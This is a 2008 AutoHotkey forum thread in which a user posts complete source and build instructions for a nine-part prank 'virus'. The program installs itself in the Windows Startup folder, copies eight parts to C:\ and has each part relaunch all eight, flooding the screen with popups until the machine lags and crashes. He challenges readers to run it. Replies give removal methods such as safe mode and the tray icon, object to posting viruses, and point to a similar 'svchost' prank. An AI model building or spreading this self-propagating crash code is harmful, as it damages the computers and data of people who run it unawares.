AutoHotkey Community

It is currently May 26th, 2012, 8:40 am

All times are UTC [ DST ]




Post new topic Reply to topic  [ 13 posts ] 
Author Message
PostPosted: June 29th, 2008, 4:31 am 
Offline

Joined: January 20th, 2008, 3:29 am
Posts: 30
I wrote a nine part script which causes huge amounts of popups to appear on the victim's computer, causing it to lag horribly followed by crashing.

by popups i mean 8 popups when you run it, 8^2 after two seconds, 8^3 after 3 seconds, 8^4 after 4 seconds, ect...

suggestions?
Also I challenge someone to put it on their computer and remove it, I will post detailed instructions in three days.

Code:
FileCopy,%A_WorkingDir%\Start.exe,C:\Documents and Settings\All Users\Start Menu\Programs\Startup,1  ; copy the ;launch code to the startup folder
FileCopy,%A_WorkingDir%\Part 1.exe,C:\,1  ; Copies Part 1 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 2.exe,C:\,1  ; Copies Part 2 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 3.exe,C:\,1  ; Copies Part 3 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 4.exe,C:\,1  ; Copies Part 4 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 5.exe,C:\,1  ; Copies Part 5 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 6.exe,C:\,1  ; Copies Part 6 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 7.exe,C:\,1  ; Copies Part 7 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 8.exe,C:\,1  ; Copies Part 8 to C:\ directory, automatically overwrites
MsgBox,262144,HAHA!!!,You're Screwed.,15  ; message box, always on top, 15 second timeout
Run, C:\Part 1.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 2.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 3.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 4.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 5.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 6.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 7.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 8.exe                        ; the eight parts of the virus. if one is missing, it wont work


and the eight parts all look like this:

Code:
MsgBox,262144,0,HAHA!,1
Run, C:\Part 1.exe
Run, C:\Part 2.exe
Run, C:\Part 3.exe
Run, C:\Part 4.exe
Run, C:\Part 5.exe
Run, C:\Part 6.exe
Run, C:\Part 7.exe
Run, C:\Part 8.exe


How do I post files on here?

To do the challenge, create nine AHK scripts and call them:
Start.ahk
Part 1.ahk
Part 2.ahk
Part 3.ahk
Part 4.ahk
Part 5.ahk
Part 6.ahk
Part 7.ahk
Part 8.ahk

then copy this code into the "Start" script:

Code:
FileCopy,%A_WorkingDir%\Start.exe,C:\Documents and Settings\All Users\Start Menu\Programs\Startup,1  ; copy the ;launch code to the startup folder
FileCopy,%A_WorkingDir%\Part 1.exe,C:\,1  ; Copies Part 1 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 2.exe,C:\,1  ; Copies Part 2 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 3.exe,C:\,1  ; Copies Part 3 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 4.exe,C:\,1  ; Copies Part 4 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 5.exe,C:\,1  ; Copies Part 5 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 6.exe,C:\,1  ; Copies Part 6 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 7.exe,C:\,1  ; Copies Part 7 to C:\ directory, automatically overwrites
FileCopy,%A_WorkingDir%\Part 8.exe,C:\,1  ; Copies Part 8 to C:\ directory, automatically overwrites
MsgBox,262144,HAHA!!!,You're Screwed.,15  ; message box, always on top, 15 second timeout
Run, C:\Part 1.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 2.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 3.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 4.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 5.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 6.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 7.exe                        ; the eight parts of the virus. if one is missing, it wont work
Run, C:\Part 8.exe                        ; the eight parts of the virus. if one is missing, it wont work


And this into the eight parts:

Code:
MsgBox,262144,0,HAHA!,1
Run, C:\Part 1.exe
Run, C:\Part 2.exe
Run, C:\Part 3.exe
Run, C:\Part 4.exe
Run, C:\Part 5.exe
Run, C:\Part 6.exe
Run, C:\Part 7.exe
Run, C:\Part 8.exe


then export them all, keep them in one folder, and run Start.exe

then see if you can remove this.

instructions will be posted in 3 days.

should be easy.

-andrei901, your average wannabe AHK expert

[ Moderator!: Title changed ]


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 6:18 am 
Hmm, are we allowed to use other scripts?

My solution would be to freeze each app, as you don't have #singleinstance fixed... then I'd just delete them 1by1


Report this post
Top
  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 7:07 am 
Offline

Joined: June 26th, 2006, 6:14 pm
Posts: 1379
Location: USA
i have thought of some improvements....but since viru$'$ are not something that ahk needs tho be known for, i will not post them. I suspect noone else will either.

edit: i also respectfully ask you to change the topic of your post to not include the word. - thx

_________________
Image
ʞɔпɟ əɥʇ ʇɐɥʍ


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 7:16 am 
Offline

Joined: May 28th, 2008, 2:11 am
Posts: 739
Location: Minnesota, USA
Solutions:
1) Power button -> Boot in safe mode -> Delete virus :lol:
2) on vista... just click no to all the little security thingies...
3) Don't click okay on the popups, open C: delete the .exe files (or really just Part 1.exe), all of the scripts will crash after the message box closes


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 1:03 pm 
Offline

Joined: June 11th, 2005, 9:34 am
Posts: 264
Location: England ish
One of the biggest pains about using a computer is viruses and spyware.

I don't like anyone developing these type of programs,
They start as a harmless prank, and end up in a full blown virus.
I'd suggest to close this post and if possible delete it.

_________________
::
I Have Spoken
::


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 4:15 pm 
Offline

Joined: April 22nd, 2007, 6:33 pm
Posts: 1833
I see you've mastered FileCopy and MsgBox. Congratulations! :roll:


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 8:50 pm 
Offline

Joined: January 20th, 2008, 3:29 am
Posts: 30
slanter: solution #1 was the one i used.

i don't know if you'll be able to find and delete the .exe for any of the parts, (unless you really know what to look for) because this is a lot of popups. I mean 8.5 billion in 11 seconds (8^11).

thank you, tic.

_________________
-andrei901, your local wannabe AHK expert


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 29th, 2008, 10:14 pm 
Offline

Joined: May 28th, 2008, 2:11 am
Posts: 739
Location: Minnesota, USA
andrei901 wrote:
8.5 billion in 11 seconds (8^11).
actually... it will be only 1 popup after 11 seconds... msgbox stops the script at that point until the message box is closed, so you should have a short time before you have any problems.

here's one more solution:
Right click on start.exe's tray icon, and click on exit within 15 seconds of logging on


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: June 30th, 2008, 8:14 am 
Code:
#SingleInstance, off
;Run % A_ScriptName
MsgBox,262144,0,HAHA!,1


Report this post
Top
  
Reply with quote  
 Post subject:
PostPosted: June 30th, 2008, 8:40 am 
Offline

Joined: June 26th, 2006, 6:14 pm
Posts: 1379
Location: USA
Slanter wrote:
Right click on start.exe's tray icon, and click on exit within 15 seconds of logging on

how about just: "Right click on start.exe's tray icon" ?
Code:
MsgBox,262144,No Way!,Hurry!`n`nClick on the scipt's menu!`n`nYou have 10 Seconds!`n`nDon't click exit though,10
MsgBox, Wow you just had an infinite amount of time to close the program!!`n`nWhy didn't you??

_________________
Image
ʞɔпɟ əɥʇ ʇɐɥʍ


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: July 1st, 2008, 4:32 am 
Offline

Joined: May 28th, 2008, 2:11 am
Posts: 739
Location: Minnesota, USA
ahklerner wrote:
how about just: "Right click on start.exe's tray icon" ?

o right lol


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: July 1st, 2008, 4:34 am 
Offline

Joined: July 15th, 2007, 1:43 am
Posts: 1320
Search the forums for svchost.exe :)

By far one of the best computer pranks ever.

_________________
Religion is false. >_>


Report this post
Top
 Profile  
Reply with quote  
 Post subject:
PostPosted: July 3rd, 2008, 3:26 am 
Offline

Joined: January 20th, 2008, 3:29 am
Posts: 30
alright, but isn't svchost a virus now?

_________________
-andrei901, your local wannabe AHK expert


Report this post
Top
 Profile  
Reply with quote  
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 13 posts ] 

All times are UTC [ DST ]


Who is online

Users browsing this forum: Exabot [Bot], fusion1920, Google [Bot], Google Feedfetcher, MSN [Bot], SKAN, Stigg and 17 guests


You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Powered by phpBB® Forum Software © phpBB Group